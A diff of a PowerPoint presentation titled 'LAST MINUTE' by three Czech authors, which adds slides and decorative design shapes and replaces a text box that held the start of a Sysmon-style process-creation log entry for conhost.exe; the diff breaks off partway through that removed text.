--- a/LastMinute.pptx
+++ b/LastMinute.pptx
@@ -6,10 +6,14 @@
   </p:sldMasterIdLst>
   <p:sldIdLst>
     <p:sldId id="256" r:id="rId2"/>
-    <p:sldId id="257" r:id="rId3"/>
-    <p:sldId id="258" r:id="rId4"/>
-    <p:sldId id="259" r:id="rId5"/>
-    <p:sldId id="260" r:id="rId6"/>
+    <p:sldId id="265" r:id="rId3"/>
+    <p:sldId id="263" r:id="rId4"/>
+    <p:sldId id="264" r:id="rId5"/>
+    <p:sldId id="257" r:id="rId6"/>
+    <p:sldId id="258" r:id="rId7"/>
+    <p:sldId id="259" r:id="rId8"/>
+    <p:sldId id="266" r:id="rId9"/>
+    <p:sldId id="260" r:id="rId10"/>
   </p:sldIdLst>
   <p:sldSz cx="12192000" cy="6858000"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -108,7 +112,24 @@
       </a:defRPr>
     </a:lvl9pPr>
   </p:defaultTextStyle>
+  <p:extLst>
+    <p:ext uri="{EFAFB233-063F-42B5-8137-9DF3F51BA10A}">
+      <p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main"/>
+    </p:ext>
+  </p:extLst>
 </p:presentation>
+</file>
+
+<file path=ppt/commentAuthors.xml><?xml version="1.0" encoding="utf-8"?>
+<p:cmAuthorLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cmAuthor id="1" name="Michael Jurek" initials="MJ" lastIdx="1" clrIdx="0">
+    <p:extLst>
+      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
+        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="a866d2a68a1f88b0" providerId="Windows Live"/>
+      </p:ext>
+    </p:extLst>
+  </p:cmAuthor>
+</p:cmAuthorLst>
 </file>
 
 <file path=ppt/slideLayouts/slideLayout1.xml><?xml version="1.0" encoding="utf-8"?>
@@ -613,7 +634,7 @@
           <a:p>
             <a:fld id="{6227B582-17D0-458D-969F-23D2DD159471}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>4/12/2019</a:t>
+              <a:t>4/13/2019</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -909,7 +930,7 @@
           <a:p>
             <a:fld id="{6227B582-17D0-458D-969F-23D2DD159471}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>4/12/2019</a:t>
+              <a:t>4/13/2019</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1157,7 +1178,7 @@
           <a:p>
             <a:fld id="{6227B582-17D0-458D-969F-23D2DD159471}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>4/12/2019</a:t>
+              <a:t>4/13/2019</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1697,7 +1718,7 @@
           <a:p>
             <a:fld id="{6227B582-17D0-458D-969F-23D2DD159471}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>4/12/2019</a:t>
+              <a:t>4/13/2019</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1945,7 +1966,7 @@
           <a:p>
             <a:fld id="{6227B582-17D0-458D-969F-23D2DD159471}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>4/12/2019</a:t>
+              <a:t>4/13/2019</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2477,7 +2498,7 @@
           <a:p>
             <a:fld id="{6227B582-17D0-458D-969F-23D2DD159471}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>4/12/2019</a:t>
+              <a:t>4/13/2019</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2774,7 +2795,7 @@
           <a:p>
             <a:fld id="{6227B582-17D0-458D-969F-23D2DD159471}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>4/12/2019</a:t>
+              <a:t>4/13/2019</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2948,7 +2969,7 @@
           <a:p>
             <a:fld id="{6227B582-17D0-458D-969F-23D2DD159471}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>4/12/2019</a:t>
+              <a:t>4/13/2019</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -3128,7 +3149,7 @@
           <a:p>
             <a:fld id="{6227B582-17D0-458D-969F-23D2DD159471}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>4/12/2019</a:t>
+              <a:t>4/13/2019</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -3298,7 +3319,7 @@
           <a:p>
             <a:fld id="{6227B582-17D0-458D-969F-23D2DD159471}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>4/12/2019</a:t>
+              <a:t>4/13/2019</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -3549,7 +3570,7 @@
           <a:p>
             <a:fld id="{6227B582-17D0-458D-969F-23D2DD159471}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>4/12/2019</a:t>
+              <a:t>4/13/2019</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -3846,7 +3867,7 @@
           <a:p>
             <a:fld id="{6227B582-17D0-458D-969F-23D2DD159471}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>4/12/2019</a:t>
+              <a:t>4/13/2019</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -4288,7 +4309,7 @@
           <a:p>
             <a:fld id="{6227B582-17D0-458D-969F-23D2DD159471}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>4/12/2019</a:t>
+              <a:t>4/13/2019</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -4406,7 +4427,7 @@
           <a:p>
             <a:fld id="{6227B582-17D0-458D-969F-23D2DD159471}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>4/12/2019</a:t>
+              <a:t>4/13/2019</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -4501,7 +4522,7 @@
           <a:p>
             <a:fld id="{6227B582-17D0-458D-969F-23D2DD159471}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>4/12/2019</a:t>
+              <a:t>4/13/2019</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -4784,7 +4805,7 @@
           <a:p>
             <a:fld id="{6227B582-17D0-458D-969F-23D2DD159471}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>4/12/2019</a:t>
+              <a:t>4/13/2019</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -5075,7 +5096,7 @@
           <a:p>
             <a:fld id="{6227B582-17D0-458D-969F-23D2DD159471}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>4/12/2019</a:t>
+              <a:t>4/13/2019</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -5605,7 +5626,7 @@
           <a:p>
             <a:fld id="{6227B582-17D0-458D-969F-23D2DD159471}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>4/12/2019</a:t>
+              <a:t>4/13/2019</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -6157,7 +6178,10 @@
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
-            <a:endParaRPr lang="en-US" dirty="0"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>LAST MINUTE</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -6182,7 +6206,19 @@
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
-            <a:endParaRPr lang="en-US"/>
+            <a:r>
+              <a:rPr lang="cs-CZ" dirty="0"/>
+              <a:t>Michael Jurek, Mikuláš </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
+              <a:t>Bankovič</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="cs-CZ" dirty="0"/>
+              <a:t>, Vojtěch Janků</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -6202,6 +6238,28 @@
 <file path=ppt/slides/slide2.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
+    <p:bg>
+      <p:bgPr>
+        <a:blipFill rotWithShape="1">
+          <a:blip r:embed="rId2">
+            <a:duotone>
+              <a:schemeClr val="bg2">
+                <a:shade val="76000"/>
+                <a:satMod val="180000"/>
+              </a:schemeClr>
+              <a:schemeClr val="bg2">
+                <a:tint val="80000"/>
+                <a:satMod val="120000"/>
+                <a:lumMod val="180000"/>
+              </a:schemeClr>
+            </a:duotone>
+            <a:extLst/>
+          </a:blip>
+          <a:stretch/>
+        </a:blipFill>
+        <a:effectLst/>
+      </p:bgPr>
+    </p:bg>
     <p:spTree>
       <p:nvGrpSpPr>
         <p:cNvPr id="1" name=""/>
@@ -6216,485 +6274,483 @@
           <a:chExt cx="0" cy="0"/>
         </a:xfrm>
       </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="8" name="Obdélník 7">
+      <p:grpSp>
+        <p:nvGrpSpPr>
+          <p:cNvPr id="48" name="Group 27">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C82994BB-411B-4118-B7FA-A89CAA13C009}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C616B3DC-C165-433D-9187-62DCC0E317D3}"/>
+              </a:ext>
+              <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
-          <p:cNvSpPr/>
-          <p:nvPr/>
+          <p:cNvGrpSpPr>
+            <a:grpSpLocks noGrp="1" noUngrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1"/>
+          </p:cNvGrpSpPr>
+          <p:nvPr>
+            <p:extLst>
+              <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+              </p:ext>
+            </p:extLst>
+          </p:nvPr>
+        </p:nvGrpSpPr>
+        <p:grpSpPr>
+          <a:xfrm>
+            <a:off x="546100" y="-4763"/>
+            <a:ext cx="5014912" cy="6862763"/>
+            <a:chOff x="2928938" y="-4763"/>
+            <a:chExt cx="5014912" cy="6862763"/>
+          </a:xfrm>
+        </p:grpSpPr>
+        <p:sp>
+          <p:nvSpPr>
+            <p:cNvPr id="29" name="Freeform 6">
+              <a:extLst>
+                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97E1BF84-9824-4B0E-98DF-F0F7181DD062}"/>
+                </a:ext>
+                <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                  <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+                </a:ext>
+              </a:extLst>
+            </p:cNvPr>
+            <p:cNvSpPr/>
+            <p:nvPr>
+              <p:extLst>
+                <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                  <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+                </p:ext>
+              </p:extLst>
+            </p:nvPr>
+          </p:nvSpPr>
+          <p:spPr bwMode="auto">
+            <a:xfrm>
+              <a:off x="3367088" y="-4763"/>
+              <a:ext cx="1063625" cy="2782888"/>
+            </a:xfrm>
+            <a:custGeom>
+              <a:avLst/>
+              <a:gdLst/>
+              <a:ahLst/>
+              <a:cxnLst/>
+              <a:rect l="0" t="0" r="r" b="b"/>
+              <a:pathLst>
+                <a:path w="670" h="1753">
+                  <a:moveTo>
+                    <a:pt x="0" y="1696"/>
+                  </a:moveTo>
+                  <a:lnTo>
+                    <a:pt x="225" y="1753"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="670" y="0"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="430" y="0"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="0" y="1696"/>
+                  </a:lnTo>
+                  <a:close/>
+                </a:path>
+              </a:pathLst>
+            </a:custGeom>
+            <a:solidFill>
+              <a:schemeClr val="accent1"/>
+            </a:solidFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+          </p:spPr>
+        </p:sp>
+        <p:sp>
+          <p:nvSpPr>
+            <p:cNvPr id="30" name="Freeform 7">
+              <a:extLst>
+                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A85FA340-7392-4303-9707-A12F45A46F96}"/>
+                </a:ext>
+                <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                  <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+                </a:ext>
+              </a:extLst>
+            </p:cNvPr>
+            <p:cNvSpPr/>
+            <p:nvPr>
+              <p:extLst>
+                <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                  <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+                </p:ext>
+              </p:extLst>
+            </p:nvPr>
+          </p:nvSpPr>
+          <p:spPr bwMode="auto">
+            <a:xfrm>
+              <a:off x="2928938" y="-4763"/>
+              <a:ext cx="1035050" cy="2673350"/>
+            </a:xfrm>
+            <a:custGeom>
+              <a:avLst/>
+              <a:gdLst/>
+              <a:ahLst/>
+              <a:cxnLst/>
+              <a:rect l="0" t="0" r="r" b="b"/>
+              <a:pathLst>
+                <a:path w="652" h="1684">
+                  <a:moveTo>
+                    <a:pt x="225" y="1684"/>
+                  </a:moveTo>
+                  <a:lnTo>
+                    <a:pt x="652" y="0"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="411" y="0"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="0" y="1627"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="219" y="1681"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="225" y="1684"/>
+                  </a:lnTo>
+                  <a:close/>
+                </a:path>
+              </a:pathLst>
+            </a:custGeom>
+            <a:solidFill>
+              <a:schemeClr val="tx1">
+                <a:lumMod val="65000"/>
+                <a:lumOff val="35000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+          </p:spPr>
+        </p:sp>
+        <p:sp>
+          <p:nvSpPr>
+            <p:cNvPr id="31" name="Freeform 9">
+              <a:extLst>
+                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{758A9051-2BD9-4868-8B84-344752FA2F60}"/>
+                </a:ext>
+                <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                  <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+                </a:ext>
+              </a:extLst>
+            </p:cNvPr>
+            <p:cNvSpPr/>
+            <p:nvPr>
+              <p:extLst>
+                <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                  <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+                </p:ext>
+              </p:extLst>
+            </p:nvPr>
+          </p:nvSpPr>
+          <p:spPr bwMode="auto">
+            <a:xfrm>
+              <a:off x="2928938" y="2582862"/>
+              <a:ext cx="2693987" cy="4275138"/>
+            </a:xfrm>
+            <a:custGeom>
+              <a:avLst/>
+              <a:gdLst/>
+              <a:ahLst/>
+              <a:cxnLst/>
+              <a:rect l="0" t="0" r="r" b="b"/>
+              <a:pathLst>
+                <a:path w="1697" h="2693">
+                  <a:moveTo>
+                    <a:pt x="0" y="0"/>
+                  </a:moveTo>
+                  <a:lnTo>
+                    <a:pt x="1622" y="2693"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="1697" y="2693"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="0" y="0"/>
+                  </a:lnTo>
+                  <a:close/>
+                </a:path>
+              </a:pathLst>
+            </a:custGeom>
+            <a:solidFill>
+              <a:schemeClr val="tx1">
+                <a:lumMod val="85000"/>
+                <a:lumOff val="15000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+          </p:spPr>
+        </p:sp>
+        <p:sp>
+          <p:nvSpPr>
+            <p:cNvPr id="32" name="Freeform 10">
+              <a:extLst>
+                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58264C49-3539-4CBD-8F11-1106C8B8781F}"/>
+                </a:ext>
+                <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                  <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+                </a:ext>
+              </a:extLst>
+            </p:cNvPr>
+            <p:cNvSpPr/>
+            <p:nvPr>
+              <p:extLst>
+                <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                  <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+                </p:ext>
+              </p:extLst>
+            </p:nvPr>
+          </p:nvSpPr>
+          <p:spPr bwMode="auto">
+            <a:xfrm>
+              <a:off x="3371850" y="2692400"/>
+              <a:ext cx="3332162" cy="4165600"/>
+            </a:xfrm>
+            <a:custGeom>
+              <a:avLst/>
+              <a:gdLst/>
+              <a:ahLst/>
+              <a:cxnLst/>
+              <a:rect l="0" t="0" r="r" b="b"/>
+              <a:pathLst>
+                <a:path w="2099" h="2624">
+                  <a:moveTo>
+                    <a:pt x="2099" y="2624"/>
+                  </a:moveTo>
+                  <a:lnTo>
+                    <a:pt x="0" y="0"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="2021" y="2624"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="2099" y="2624"/>
+                  </a:lnTo>
+                  <a:close/>
+                </a:path>
+              </a:pathLst>
+            </a:custGeom>
+            <a:solidFill>
+              <a:schemeClr val="accent1">
+                <a:lumMod val="50000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+          </p:spPr>
+        </p:sp>
+        <p:sp>
+          <p:nvSpPr>
+            <p:cNvPr id="33" name="Freeform 11">
+              <a:extLst>
+                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE862133-5C7E-4B32-9786-0B33BC51A75B}"/>
+                </a:ext>
+                <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                  <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+                </a:ext>
+              </a:extLst>
+            </p:cNvPr>
+            <p:cNvSpPr/>
+            <p:nvPr>
+              <p:extLst>
+                <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                  <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+                </p:ext>
+              </p:extLst>
+            </p:nvPr>
+          </p:nvSpPr>
+          <p:spPr bwMode="auto">
+            <a:xfrm>
+              <a:off x="3367088" y="2687637"/>
+              <a:ext cx="4576762" cy="4170363"/>
+            </a:xfrm>
+            <a:custGeom>
+              <a:avLst/>
+              <a:gdLst/>
+              <a:ahLst/>
+              <a:cxnLst/>
+              <a:rect l="0" t="0" r="r" b="b"/>
+              <a:pathLst>
+                <a:path w="2883" h="2627">
+                  <a:moveTo>
+                    <a:pt x="0" y="0"/>
+                  </a:moveTo>
+                  <a:lnTo>
+                    <a:pt x="3" y="3"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="2102" y="2627"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="2883" y="2627"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="225" y="57"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="0" y="0"/>
+                  </a:lnTo>
+                  <a:close/>
+                </a:path>
+              </a:pathLst>
+            </a:custGeom>
+            <a:solidFill>
+              <a:schemeClr val="accent1">
+                <a:lumMod val="75000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+          </p:spPr>
+        </p:sp>
+        <p:sp>
+          <p:nvSpPr>
+            <p:cNvPr id="34" name="Freeform 12">
+              <a:extLst>
+                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90925F6C-DF03-4707-9176-6049F049B5AA}"/>
+                </a:ext>
+                <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                  <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+                </a:ext>
+              </a:extLst>
+            </p:cNvPr>
+            <p:cNvSpPr/>
+            <p:nvPr>
+              <p:extLst>
+                <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                  <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+                </p:ext>
+              </p:extLst>
+            </p:nvPr>
+          </p:nvSpPr>
+          <p:spPr bwMode="auto">
+            <a:xfrm>
+              <a:off x="2928938" y="2578100"/>
+              <a:ext cx="3584575" cy="4279900"/>
+            </a:xfrm>
+            <a:custGeom>
+              <a:avLst/>
+              <a:gdLst/>
+              <a:ahLst/>
+              <a:cxnLst/>
+              <a:rect l="0" t="0" r="r" b="b"/>
+              <a:pathLst>
+                <a:path w="2258" h="2696">
+                  <a:moveTo>
+                    <a:pt x="2258" y="2696"/>
+                  </a:moveTo>
+                  <a:lnTo>
+                    <a:pt x="264" y="111"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="228" y="60"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="225" y="57"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="0" y="0"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="0" y="3"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="1697" y="2696"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="2258" y="2696"/>
+                  </a:lnTo>
+                  <a:close/>
+                </a:path>
+              </a:pathLst>
+            </a:custGeom>
+            <a:solidFill>
+              <a:schemeClr val="tx1">
+                <a:lumMod val="75000"/>
+                <a:lumOff val="25000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+          </p:spPr>
+        </p:sp>
+      </p:grpSp>
+      <p:sp useBgFill="1">
+        <p:nvSpPr>
+          <p:cNvPr id="50" name="Rectangle 35">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6073935-E043-4801-AF06-06093A9145F7}"/>
+              </a:ext>
+              <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:extLst>
+              <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+              </p:ext>
+            </p:extLst>
+          </p:nvPr>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="1571625" y="728227"/>
-            <a:ext cx="10515600" cy="4893647"/>
+            <a:off x="0" y="0"/>
+            <a:ext cx="12192000" cy="6858000"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
           </a:prstGeom>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
         </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
           <a:lstStyle/>
           <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>"Process Create:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>RuleName</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>: </a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>UtcTime</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>: 2019-03-26 21:14:44.276</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>Image: C:\Windows\System32\conhost.exe</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
